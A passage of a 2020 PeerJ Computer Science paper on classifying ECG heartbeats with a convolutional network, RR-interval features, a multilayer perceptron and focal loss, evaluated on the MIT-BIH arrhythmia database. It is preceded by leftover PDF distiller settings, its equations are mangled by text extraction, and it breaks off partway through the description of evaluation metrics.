<FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_srqjbxaffzfbdcxe4yczy7eafi ---- A hybrid method for heartbeat classification via convolutional neural networks, multilayer perceptrons and focal loss A hybrid method for heartbeat classification via convolutional neural networks, multilayer perceptrons and focal loss Tao Wang1, Changhua Lu1, Mei Yang2, Feng Hong1 and Chun Liu3 1 School of Computer and Information, Hefei University of Technology, Hefei, Anhui, China 2 Beijing Huaru Technology Co., Ltd. Hefei Branch, Hefei, Anhui, China 3 School of Electrical Engineering and Automation, Hefei University of Technology, Hefei, Anhui, China ABSTRACT Background: Heart arrhythmia, as one of the most important cardiovascular diseases (CVDs), has gained wide attention in the past two decades. The article proposes a hybrid method for heartbeat classification via convolutional neural networks, multilayer perceptrons and focal loss. Methods: In the method, a convolution neural network is used to extract the morphological features. The reason behind this is that the morphological characteristics of patients have inter-patient variations, which makes it difficult to accurately describe using traditional hand-craft ways. Then the extracted morphological features are combined with the RR intervals features and input into the multilayer perceptron for heartbeat classification. The RR intervals features contain the dynamic information of the heartbeat. Furthermore, considering that the heartbeat classes are imbalanced and would lead to the poor performance of minority classes, a focal loss is introduced to resolve the problem in the article. Results: Tested using the MIT-BIH arrhythmia database, our method achieves an overall positive predictive value of 64.68%, sensitivity of 68.55%, f1-score of 66.09%, and accuracy of 96.27%. Compared with existing works, our method significantly improves the performance of heartbeat classification. Conclusions: Our method is simple yet effective, which is potentially used for personal automatic heartbeat classification in remote medical monitoring. The source code is provided on https://github.com/JackAndCole/Deep-Neural- Network-For-Heartbeat-Classification. Subjects Artificial Intelligence, Data Mining and Machine Learning, Emerging Technologies Keywords Arrhythmia, Heartbeat classification, Focal loss, Convolutional neural network, Class imbalance INTRODUCTION Heart arrhythmia, one of the most important cardiovascular disease (CVD), refers to the irregular beating of the patient’s heart. Most arrhythmias are asymptomatic and not severe, but some could cause heart disease symptoms such as passing out, lightheadedness, chest pain, shortness of breath, and even stroke and cardiac arrest such as ventricular fibrillation, ventricular escape and atrial fibrillation, which are extremely dangerous and How to cite this article Wang T, Lu C, Yang M, Hong F, Liu C. 2020. A hybrid method for heartbeat classification via convolutional neural networks, multilayer perceptrons and focal loss. PeerJ Comput. Sci. 6:e324 DOI 10.7717/peerj-cs.324 Submitted 2 September 2020 Accepted 7 November 2020 Published 30 November 2020 Corresponding authors Tao Wang, wtustc@mail.ustc.edu.cn Chun Liu, dqlch03@hfut.edu.cn Academic editor Robertas Damaševičius Additional Information and Declarations can be found on page 14 DOI 10.7717/peerj-cs.324 Copyright 2020 Wang et al. Distributed under Creative Commons CC-BY 4.0 https://github.com/JackAndCole/Deep-Neural-Network-For-Heartbeat-Classification https://github.com/JackAndCole/Deep-Neural-Network-For-Heartbeat-Classification http://dx.doi.org/10.7717/peerj-cs.324 mailto:wtustc@�mail.�ustc.�edu.�cn mailto:dqlch03@�hfut.�edu.�cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.324 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ need immediate treatment. According to statistics from the World Health Organization, the number of CVD deaths in 2015 is close to 17.7 million, accounting for about 31% of the total deaths (Shen et al., 2019). Electrocardiogram (ECG), a device that records the electrical activity of the heart, is widely used to diagnose cardiac arrhythmias in clinical (Mondéjar-Guerra et al., 2019). An ECG signal consists of a series of periodically repeating heartbeats. Each heartbeat usually contains a QRS complex, a T wave, and a P wave, in a few cases there is a U wave (Vulaj et al., 2017). The most significant characteristic of an ECG signal is the QRS complex. By analyzing this complex, arrhythmia can be detected. However, the occurrence of arrhythmia is intermittent, especially in the early stages, which makes it difficult to perform effective detection in a short time (Mondéjar-Guerra et al., 2019). To solve this problem, a Holter monitor is often used to collect long-term heart electrical activity recordings (Sannino & De Pietro, 2018). In general, an ECG recording lasts several minutes or even hours. Investigating a variety of abnormal arrhythmias beat-by-beat from long-term ECG recordings is very exhausting, even for trained cardiologists. Therefore, there is an urgent need for a computer-aided method to automatically detect abnormal heartbeats from long-term ECG data. Over the past two decades, a lot of research works (De Albuquerque et al., 2018; De Chazal, O’Dwyer & Reilly, 2004; Mondéjar-Guerra et al., 2019) have been spent on classifying heartbeats automatically. Most of these methods are based on morphological characteristics of heartbeats and traditional signal processing techniques. However, the ECG waveform and its morphological characteristics (e.g., the shape of the QRS waves and P wave) of different patients are significantly different, and for the same patient, there are also differences in different circumstances (Mondéjar-Guerra et al., 2019), so the fixed features used in these methods are not sufficient to accurately distinguish arrhythmias for all patients. In recent years, some deep neural networks have been proposed, such as convolutional neural networks (CNN), which can automatically extract morphological features and adapt to variations between patients. Nevertheless, there is another challenge when processing medical data. Due to the limited number of rare classes, the number of one class may greatly exceed that of other classes, that is, the distribution of classes is imbalanced. However, most algorithms try to minimize the overall classification loss during the training process, which implies that these classes are equally important and the same misclassification cost is allocated to all types of errors. As a result, the classifier will tend to correctly classify and favor more frequent classes. The article presents a hybrid method for heartbeat classification via CNN, multilayer perceptrons (MLP) and focal loss. An overall structure of the method is displayed in Fig. 1. The morphological features are extracted by one-dimensional (1D) CNN and combined with the RR intervals features as the input of MLP. The RR intervals features contain the dynamic information of the heartbeat, which could help better capture the pattern of the ECG waveform. Furthermore, considering that the heartbeat classes are Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.324 2/17 http://dx.doi.org/10.7717/peerj-cs.324 https://peerj.com/computer-science/ imbalanced and would lead to the poor performance of minority classes, a focal loss is introduced to solve the problem. It shows superior performance in various application environments (Howland et al., 2002; Lin et al., 2017; Zhou, Waterman-Storer & Cohan, 2002). By testing in the well-known MIT-BIH arrhythmia database (Moody & Mark, 2001), our method achieves superior classification performance than existing heartbeat classification methods. Note that the accuracy of the ECG classification method has been standardized according to the Association for the Advancement of Medical Instrumentation’s (AAMI) recommendations. The proposed method obtains an overall PPV of 64.68%, SE of 68.55%, F1 of 66.09%, and accuracy of 96.27%. The article is organized as follows: “Related Works” presents the related works of heartbeat classification. The proposed method and loss function are introduced in “Methods” and “Loss Function”. The dataset and the performance of our method against existing works are described in “Results”. “Discussion” discusses the conclusions. Figure 1 A scheme of our proposed method. (A) Overview of our method. (B) CNN block of our CNN architecture. (C) An example of mor- phological features extracted by CNN, where the upper part heartbeat signal is the input of CNN, and the lower part is the features extracted by CNN, that is, the morphological features. These features will be flattened and combined with the RR interval features when used as the input of the MLP classifier. Full-size DOI: 10.7717/peerj-cs.324/fig-1 Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.324 3/17 http://dx.doi.org/10.7717/peerj-cs.324/fig-1 http://dx.doi.org/10.7717/peerj-cs.324 https://peerj.com/computer-science/ RELATED WORKS The existing automatic heartbeat classification works can be divided into two paradigms: intra-patient paradigm and inter-patient paradigm (De Chazal, O’Dwyer & Reilly, 2004; Sannino & De Pietro, 2018). In the intra-patient paradigm, the dataset is based on the heartbeat label split into training and test subsets, so an ECG recording will appear in two subsets (Sannino & De Pietro, 2018). According to De Chazal, O’Dwyer & Reilly (2004), the results of this paradigm are biased, resulting in an accuracy of about 100% in the test phase, because the patient’s characteristics are learned during the training phase (Sellami & Hwang, 2019). However, in actual scenarios, the trained model must be able to handle inter-patient variations during the training phase. In the inter-patient paradigm, the training set and test set are from different patients (Sannino & De Pietro, 2018), so the differences between patients will be considered during the training process. The classifier will show a better generalization capability. For instance, De Chazal, O’Dwyer & Reilly (2004) propose a linear discriminant heartbeat classification method based on heartbeat morphological and dynamic features. Their method achieves a PPV of 38.5%, SE of 75.9% in the SVEB class, and a PPV of 81.6%, SE of 80.3% in the VEB class. Ye, Kumar & Coimbra (2012) apply wavelet transform and independent component analysis (ICA) to extract morphological features from heartbeats, and combined with dynamic RR interval features develop an support vector machine (SVM) method to classify heartbeat. A PPV of 52.3%, SE of 60.8% in the SVEB class, and a PPV of 63.1%, SE of 81.5% in the VEB class are obtained by their method. However, the classification accuracies of these methods are significantly lower than the intra-patient paradigm-based methods. This is due to variations of ECG characteristics between patients. Recently, with the rapid development in deep learning, deep neural networks-based, especially CNN-based, heartbeat classification methods have received a lot of attention. For example, Yıldırım et al. (2018) develop a 1D-CNN for arrhythmia detection based on long-term ECG signal. Their method achieves 91.33% overall accuracy in 17 cardiac arrhythmias. Similarly, Sellami & Hwang (2019) develop a CNN with a batch-weighted loss function for heartbeat classification. Hannun et al. (2019) present a deep neural network with residual block to classify 12 rhythm classes. Romdhane et al. (2020) based on CNN and focal loss propose an ECG heartbeat classification method. Although the performance of heartbeat classification is improved, these works mainly focus on using CNN to extract the heartbeat morphological features, while ignoring the influence of RR intervals on heartbeat classification. Research shows that by integrating RR interval features, the performance of heartbeat classification can be significantly improved (De Chazal, O’Dwyer & Reilly, 2004; Mondéjar-Guerra et al., 2019; Sannino & De Pietro, 2018). Romdhane et al. (2020) try to use an improved heartbeat segmentation method to make CNN capture RR interval information, but in their work, CNN can only extract the previous RR interval information at most. This is due to the incomplete division of the right interval. Different from existing works, we pre-extract the RR interval Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.324 4/17 http://dx.doi.org/10.7717/peerj-cs.324 https://peerj.com/computer-science/ information in advance, and then combine it with CNN-based morphological features as the input of the classifier. In addition to the above two classification paradigms, a hybrid paradigm has also been studied by some scholars, namely patient-specific paradigm. In the patient-specific paradigm, a global model is first built and then use part of patient data to tune the model to form a local model. De Chazal, O’Dwyer & Reilly (2004) shows that this paradigm is superior to a pure inter-patient model. However, this paradigm requires a professional doctor to label part of the ECG data, and an engineer to fine-tuning the model in clinical. Meanwhile, the patient’s ECG signal may change significantly over time, that is, the current ECG signal may undergo large variations at some time in the future, and the use of a previously fine-tuned local classifier may lead to larger misclassification. We focus on the performance of our method in the inter-patient paradigm in the article. METHODS Figure 1 shows the overall structure of the proposed method. The proposed method includes three steps: ECG denoising, feature extraction, and classification. The feature extraction step contains RR intervals features extraction and morphological features extraction via CNN architecture. ECG denoising The ECG signal is usually disturbed by various noises such as electromyography noise, power line interference and baseline wandering (Chen et al., 2017), which makes useful features to be difficultly extracted. In this step, most previous works typically perform a baseline wandering removal and then high-frequency noise filtering (Mondéjar- Guerra et al., 2019). However, excessive filtering will lead to the loss of some helpful information in the ECG signal. Since CNN has better noise immunity (Huang et al., 2018), we only perform baseline wandering removal and preserve as much information as possible from the raw ECG signal. Two median filters are combined to remove the baseline wandering of the ECG signal in the article. First, the QRS complexes and P-waves are removed using a 200-ms width median filter, and then a 600-ms width median filter is further adopted to remove T-waves. The output is the baseline wandering of the ECG signal, and the baseline-corrected ECG signal can be achieved by subtracting it from the original signal. An effect of baseline wandering removal is shown in Fig. 2. After obtaining the baseline-corrected ECG signal, the ECG is further segmented into a series of heartbeats based on the labeled R-peaks. In specific, for each heartbeat, we obtain 200 sampling points of the ECG signal segment, 90 sampling points before and 110 sampling points after the labeled R peak. The R-peak detection is not the focus of the article and we directly use labeled R-peaks in the dataset, as there are many high-precision (>99%) R-peak detection methods in the literature (Gacek & Pedrycz, 2012; Pan & Tompkins, 1985). Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.324 5/17 http://dx.doi.org/10.7717/peerj-cs.324 https://peerj.com/computer-science/ RR interval features extraction The time interval between two consecutive R-peaks is normally called the RR interval (Ruangsuwana, Velikic & Bocko, 2010), which contains the dynamic information of the heartbeat. To capture this information for heartbeat classification, four features are extracted from the RR interval, namely previous RR interval, post RR interval, ratio RR and local RR interval. The previous RR interval refers to the distance between the current R-peak position and the previous R-peak, the post RR interval is the distance between the current R-peak position and the following one. The ratio RR represents the ratio of the previous RR interval and the post RR interval. These three features reflect the instantaneous rhythm of a heartbeat. The average value of the 10 RR intervals before the current heartbeat is taken as the local RR interval, which represents the overall rhythm in the past. Due to the inter-patient variations in the ECG signal, the RR interval of different patients cannot be directly compared, in this article we use the entire patient’s ECG signal to calculate the average RR interval, and subtract it from all RR characteristics (expect the ratio RR) to eliminate this effect. Morphological features extraction via CNN architecture Convolutional neural networks is a powerful deep neural network inspired by visual neuroscience (Chu, Shen & Huang, 2019b). It has been successfully used in speech recognition, natural language processing, image classification, and biomedical signal (Palaz & Collobert, 2015; Pourbabaee, Roshtkhari & Khorasani, 2018; Yin et al., 2017). Given an image, CNN can effectively learn high-level abstractions, which can then be input into the classifier (e.g., fully connected neural network and SVM) for classification (Zhang, Zhou & Zeng, 2017). A CNN usually consists of convolutional layers, activation functions, and pooling layers, and sometimes including batch normalization layers. Figure 2 Example of baseline wandering removal. (A) Raw ECG signal. (B) Raw heartbeat. (C) Base- line-corrected ECG signal. (D) Baseline-corrected heartbeat. It is easy to notice that after removing the baseline wandering, the heartbeat is shifted to zero. Full-size DOI: 10.7717/peerj-cs.324/fig-2 Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.324 6/17 http://dx.doi.org/10.7717/peerj-cs.324/fig-2 http://dx.doi.org/10.7717/peerj-cs.324 https://peerj.com/computer-science/ Convolutional Layer: It is the most important component in CNN and performs convolution operation on the input data (Liu & Chen, 2017). Let fk and s be the filter and the 1D ECG signal, respectively. The output of the convolution is calculated as follows: C i½ � ¼ s ið Þ � fk ið Þ ¼ X m s mð Þfk i � mð Þ where m is the size of the filter and the filter fk is realized by sharing the weights of adjacent neurons. Activation Function: The activation function is used to determine whether the neuron should be activated. The purpose is to enable neurons to achieve nonlinear classification. Rectifier Linear Unit (ReLU) is one of the most widely used activation function, which can be expressed as f xð Þ ¼ max 0; xð Þ where x is the output value of the neuron. Pooling layer: The pooling layer, also known as the down-sampling layer, is an operation that decreases the computational intensity by reducing the output neuron dimension of the convolutional layer, and can handle some variations due to signal shift and distortion (Zhang, Zhou & Zeng, 2017). The most widely used pooling method is the max-pooling, which is to apply the maximum function over input s. Let m be the filter size, and the output is: M xð Þ ¼ max s x þ kð Þ kj jj � m � 1 2 � � Batch Normalization Layer: The batch normalization layer is a technology for standardizing network input, applied to either the activations of a prior layer or inputs directly, which can accelerate the training process, and provides some regularization, reducing generalization error. Let B ¼ xi; i ¼ 1; � � � ; mf g be a mini-batch of the entire training set, the output of batch normalization is as follows: bxi ¼ xi � mBffiffiffiffiffiffiffiffiffiffiffiffiffiffi s2B þ e p where sB and μB are the variance and the mean of training set B, respectively. e is an arbitrarily small constant to ensure the denominator is not zero. A CNN is developed and utilized for heartbeat morphological feature extraction in this article. The CNN architecture is displayed in Fig. 1. It contains three convolutional blocks and three pooling layers. Each convolutional block includes a convolution layer, a ReLU activation function and a batch normalization layer. The kernel of the convolution is reduced as the network structure becomes deeper. For instance, the first convolution kernel is 11, while the second is reduced to 5. A batch normalization and ReLU activation are applied after each convolution operation, and a max-pooling is used to reduce the spatial dimension. Note that the parameters of the convolutional network are usually set based on the author’s experience. The detailed parameters of CNN architecture are listed in Table 1. The output of the last pooling layer is the morphological features Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.324 7/17 http://dx.doi.org/10.7717/peerj-cs.324 https://peerj.com/computer-science/ extracted by CNN from the heartbeat. An illustration of the morphological features extracted from the heartbeat is shown in Fig. 1C. MLP classifier The CNN-based morphological features and RR interval features are combined as the input of the classifier in the article. In general, any classifier (i.e., SVM and random forest (RF)) can be used for heartbeat classification. Here, we adopt a multilayer perceptron (MLP, also known as fully connected neural networks in deep learning) as the classifier. The reason behind this is that CNN and MLP can be combined for parameter training (we call it one-step training). Compared with other methods, this usually achieves better performance. Specifically, our MLP classifier contains an input layer, a hidden layer and an output layer. The input layer consists of two parts of information: CNN-based morphological features and RR interval features. The hidden layer has 64 neurons, and each neuron is connected to the input features. The output layer neurons are 4 in the article, each representing a kind of arrhythmia or normal heartbeat. The details of our method are shown in Fig. 1 and Table 1. Loss function Before training a deep neural network, a loss function is first needed. The cross-entropy loss is the most widely used in deep neural network classification (Chu, Wang & Lu, 2019a). Table 1 The detailed parameters of our proposed deep neural network. Layers Layer name Kernel size No. of filters Stride Output shape No. of trainable parameters No. of non-trainable parameters 0 Input1a – – – 200 × 1 – – 1 1D Convolution 11 16 3 64 × 16 192 – 2 Batch Normalization – – – 64 × 16 32 32 3 ReLU – – – 64 × 16 – – 4 Max-Pooling 3 – 2 31 × 16 – – 5 1D Convolution 5 32 1 27 × 32 2,592 – 6 Batch Normalization – – – 27 × 32 64 64 7 ReLU – – – 27 × 32 – – 8 Max-Pooling 3 – 2 13 × 32 – – 9 1D Convolution 3 64 1 11 × 64 6,208 – 10 Batch Normalization – – – 11 × 64 128 128 11 ReLU – – – 11 × 64 – – 12 Max-Pooling 3 – 2 5 × 64 – – 13 Flatten – – – 320 – – 14 Input2b – – – 4 – – 15 Concatenate – – – 324 – – 16 Dense – – – 64 20,800 – 17 Dense – – – 4 260 – Notes: a Refers to the raw signal of the heartbeat. The morphological features of the heartbeat will be obtained through the CNN architecture. b Is the RR interval features of the heartbeat. It will be combined with the CNN-based morphological features to build the final classification model. Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.324 8/17 http://dx.doi.org/10.7717/peerj-cs.324 https://peerj.com/computer-science/ However, this loss function does not address the class imbalance problem. A focal loss function is introduced in the article to deal with this problem. Cross-entropy loss The cross-entropy is a measure in information theory (Robinson, Cattaneo & El-Said, 2001). It is based on entropy and calculates the difference between two probability distributions. Closely related to KL divergence that computers the relative entropy between two probability distributions, but the cross-entropy calculates the total entropy between the distributions. The cross-entropy is usually taken as the loss function in deep neural network classification (Chu, Wang & Lu, 2019a). Let ti and pi be the ground truth and the estimated probability of each category, the cross-entropy loss is computed by: CE ¼ � XC i ti � log pið Þ where C refers to the category set of the heartbeat. In the cross-entropy loss, each category is treated equally, which causes the majority category to overwhelm the loss and the model tends to classify to the majority category in an imbalanced environment. Focal loss A characteristic of cross-entropy loss is that even easy-to-classify examples can cause significant losses, which will cause the loss of easy examples that constitute most of the dataset during the training process to negatively affect rare classes (Lin et al., 2017). The focal loss is designed to deal with this imbalanced problem by reshaping the cross- entropy loss function by reducing the attention to easy examples and focusing on difficult ones. A general formula for focal loss is expressed as: FL ¼ � XC i ti � 1 � pið Þglog pið Þ where g acts as the modulating factor. As shown in Fig. 3, the higher the c value, the lesser the cost incurred by well-classified examples. In practice, the α-balanced variant of the focal loss is usually used when one or more categories are highly imbalanced, which is defined as: FL 0 ¼ � XC i ti � ai 1 � pið Þglog pið Þ where ai is the weighting factor of each category. RESULTS Data set The ECG dataset from the MIT-BIH arrhythmia database (Moody & Mark, 2001) is used to test our proposed method. This dataset contains 48 30-min ambulatory two leads ECG signal records collected from 47 subjects. Each ECG signal is sampled at 360 Hz with Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.324 9/17 http://dx.doi.org/10.7717/peerj-cs.324 https://peerj.com/computer-science/ an 11-bit resolution. The first lead is the modified-lead II (ML II), and the second lead depends on the record, one of V1, V2, V4 or V5. The heartbeat of these ECG signals is independently labeled by two or more doctors, and there are about 110,000 heartbeats. According to the recommendation of AAMI, these heartbeats are further divided into five heartbeat classes. Table 2 shows the mapping of AAMI classes and MIT-BIH arrhythmia heartbeat types. Since Q is practically non-existent, we ignore it like others (Mar et al., 2011; Zhang et al., 2014). Meanwhile, four recordings with paced beats are Figure 3 The relationship between the modulating factor γ and the cost of the well-classified examples (Lin et al., 2017). Full-size DOI: 10.7717/peerj-cs.324/fig-3 Table 2 Mapping of AAMI classes and MIT-BIH arrhythmia heartbeat types. AAMI classes MIT-BIH types MIT-BIH annotate Normal (N) Normal beat (NOR) N Nodal (junctional) escape beat (NE) j Atrial escape beat (AE) e Right bundle branch block beat (RBBB) R Left bundle branch block beat (LBBB) L Supraventricular ectopic beat (SVEB) Aberrated arial premature beat (aAP) a Premature or ectopic supraventricular beat (SP) S Nodal (junctional) premature beat (NP) J Atrial premature beat (AP) A Ventricular ectopic beat (VEB) Ventricular escape beat (VE) E Premature ventricular contraction (PVC) V Fusion beat (F) Fusion of ventricular and normal beat (fVN) F Unknown beat (Q) Unclassifiable beat (U) Q Fusion of paced and normal beat (fPN) f Paced beat (P) / Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.324 10/17 http://dx.doi.org/10.7717/peerj-cs.324/fig-3 http://dx.doi.org/10.7717/peerj-cs.324 https://peerj.com/computer-science/ removed in consistent with the AAMI recommended practice, namely 102, 104, 107 and 217. Since all records have ML II ECG signals and they are widely used in wireless body sensor network (WBSN) based ECG applications, this lead ECG signal is used for heartbeat classification in the article. As we mentioned in related works, the article focuses on the heartbeat classification under the inter-patient paradigm. To facilitate comparison with existing works, we follow De Chazal, O’Dwyer & Reilly (2004) to split the dataset into two subsets. Each contains regular and complex arrhythmia records and has roughly the same number of heartbeat types. Table 3 shows the details of two subsets. The first (DS1) is used for training whereas the second (DS2) is used to test the heartbeat classification performance (De Chazal, O’Dwyer & Reilly, 2004). No patient appears in both subsets at the same time. Model training and performance metrics In the study, the general focal loss (non-α-balanced focal loss) is used as the loss function, and the modulating factor g is set to the default value (g = 2). Since Adam can accelerate the model training, we use it as the optimizer. The batch size of the model is set to 512 and the maximum epoch is 50. The initial learning rate is 0.001, and reduced by 0.1 times every 10 epochs. In addition, in order to avoid overfitting, the l2 penalty is set to 1e−3 based on trial and error. The model is implemented using Keras and trained on the NVIDIA GeForce RTX 2080Ti graphical processing unit. To evaluate the performance of our proposed method, three widely used metrics are adopted, namely positive predictive value (PPV), sensitivity (SE), and accuracy (ACC), which are defined as: PPVi ¼ TPi TPi þ FPi SEi ¼ TPi TPi þ FNi ACCi ¼ TPi þ TNi TPi þ TNi þ FPi þ FNi where TPi (true positive) refers to the number of the ith class is correctly classified, FPi (false positive) is equal to the number of heartbeats misclassified as the ith class, TNi (true negative) is the number of heartbeats that are not in the ith class and not classified into the ith class, and FNi (false negative) is equal to the number of heartbeats of the ith class classified as other classes. PPVi indicates the proportion of positive correct Table 3 Detailed breakdown of the dataset. Dataset No. of samples per AAMI class Total N SVEB VEB F DS1 45,824 943 3,788 414 50,969 DS2 44,218 1,836 3,219 388 49,661 Total (DS1 + DS2) 90,042 2,779 7,007 802 100,630 Wang et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.324 11/17 http://dx.doi.org/10.7717/peerj-cs.324 https://peerj.com/computer-science/ classification, and SEi reflects the sensitivity of the classifier in the ith class. ACCi is the ratio of 